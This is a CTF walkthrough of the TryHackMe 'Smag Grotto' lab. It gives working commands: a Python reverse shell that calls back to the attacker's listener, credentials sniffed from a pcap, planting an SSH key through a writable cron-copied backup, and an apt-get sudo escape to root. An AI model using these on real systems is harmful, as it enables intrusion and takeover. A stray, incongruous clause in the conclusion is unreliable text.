Tryhackme - Smag Grotto

Tryhackme – Smag Grotto

In this walk through, we will be going through the Smag Grotto room from Tryhackme. This room is rated as Easy on the platform and consist Enumeration, Wireshark pcap analysis, Cron job abuse and Privilege escalation. So, let’s get started without any delay.

Smag Grotto

Machine Info:

TitleSmag Grotto
IPaddress10.10.71.178
DifficultyEasy
ObjectiveDeploy the machine and get root privileges.

Enumeration:

  • I started with a regular nmap scan with service version detection and found two ports opened – 80 (HTTP) and 22 (SSH).

sudo nmap -sS -sV 10.10.71.178

nmap scan

  • Next, fired up gobuster on the web server running on port 80 and found a directory named – /mail.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.71.178/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.71.178/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/18 22:59:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 402]
/mail                 (Status: 301) [Size: 311] [--> http://10.10.71.178/mail/]
/server-status        (Status: 403) [Size: 277]                                
                                                                               
===============================================================
2023/11/18 23:01:19 Finished
===============================================================

gobuster scan

  • The directory consist a copy of the emails sent among the server’s admin and consist of a pcap file for analysis. There is a note in the last email, where we have been instructed to download the pcap file via wget.

Network Migration email

Re: Network Migration

  • Used wget to download the file on my local machine for further inspection.

wget http://10.10.71.178/aW1wb3J0YW50/dHJhY2Uy.pcap

wget pcap file

  • Loaded the pcap file in Wireshark and followed the HTTP data stream in it. Found a username and password combo in a login request to an internal server named development.smag.thm.

Wireshark

Wireshark HTTP steam

  • In order to access the development server where the login request was issued as per the HTTP steam. We have to add it our /etc/hosts file.

helpdesk:cH4nG3M3_n0w

edit /etc/hosts file

  • Once done with the configuration in /etc/hosts, we are able to access the server. The server contains a login panel link which we can access with our found credentials.

development.smag.thm

Admin login panel

  • Once logged in, we are presented with a shell interface where we can commands. A tried a variety of commands but was unable to see any result in the frontend. Next, i also tried to login to the server via SSH with our found credentials but got no luck.

Enter a command

ssh login attempt

Initial Access:

  • I then tried to get a reverse shell with the below payload and luckily this time got a connection back to our netcat listener.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.1.78",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python reverse shell

netcat listener

permission denied

  • Next, in order to access the user flag we have to escalate our privileges to be user jake. So, fired up linpeas on the machine and an interesting cron job got my attention where the copy of jake’s SSH public key is being backed up and a cron job is set to copy the contents of the backup file to jake’s authorized keys in his .ssh directory.

linpeas output

  • I checked the permissions for the backup file and found that we can read and write changes to the file. BIngo!

jake_id_rsa.pub.backup

  • That means, we can add our public key to the backup file and once the cron job will run, we can access the server via SSH with our private key as jake. So, i generated a pair of SSH keys on my local machine using ssh-keygen.

ssh-keygen

ssh-keygen

  • Next, i copied it to the jake_id_rsa.pub.backup file.

cat jake.pub

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXafOG9d6uI0bGBY6+4pwaOaKglkfJgbA/PAAazPaz+28HxC1rOxzc8aykUGKKta7qk3Umqs9S/WtzikPwB88fOAGj05LxtTE2Xl8xWNU9mhwJ1xuQFqJJBeT0ia1/0NRiYPao15QkgWjROsTWfgD2YL0jawwkkLzG5idQ+OevEAoSt2RYcG3oFm1kvtZZuM3oNYlFYehbkF495nkC0iRITECxSyvliOsRPTlndfGS4IGEiAMcUW9kqQMKRCpCw8az1IkYln3jMTZNUopx2uE0dIbXQO88YcMWyEhF9LWMECJDkxHUHaa2YCuxxeCiYpF9RK/P8I3cYP+f/Ws5FVu285TD3BoLMnup3yoY1hbs0Z9t2JEaDaPRl3JcjuMC/YSeLhiIqETDCAxLwMC0j/9KoslVBQ+NCIGwFfIQE56cbwS2xXMFpEE0Xj3nhxpq3n+L8YS2WMUS5BcC99i1b/cYl+Kmbll5u6uTaDmlDNSJTlk3AOM1tkvq9wAfwjkAD7s= wh1terose@fsociety' > jake_id_rsa.pub.backup

copy public key to jake backup

  • Logged in successfully as user jake with our generated private key and got the user flag.

ssh login jake

user flag

Privilege Escalation:

  • Next, checked the sudo permissions for user jake and found that he can run apt-get binary without any password as root.

sudo -l

sudo -l

  • Used GTFObins to exploit the binary and got the root flag.

GTFObins apt-get exploit

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

root flag

Task 1 – Smag Grotto

Question 1 – What is the user flag?

Question 2 – What is the root flag?

Task 1 - Smag Grotto

Also Read: Tryhackme – Retro

Conclusion:

Conclusion

So that was “Smag Grotto” for you. We first started with our regular nmap scan and found two ports opened – 80 (HTTP) and 22 (SSH). Next, we fired gobuster on the web server running and found a directory named /mail which has copies of emails that was exchanged between the server’s machine where we found a pcap file. Downloaded the pcap using wget and loaded it in wireshark for further inspection. Found a username and password in a HTTP stream. Used it to login into a development server on development.smag.thm and used the command shell functionality to get a reverse shell connection back to our netcat listener. Next, abused a cron job by adding our generated SSH public key to jake’s .SSH directory and got access as jake using our private key. At last, exploited the sudo permissions for apt-get to get the root flag and the permission to cheat on my dead wife. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top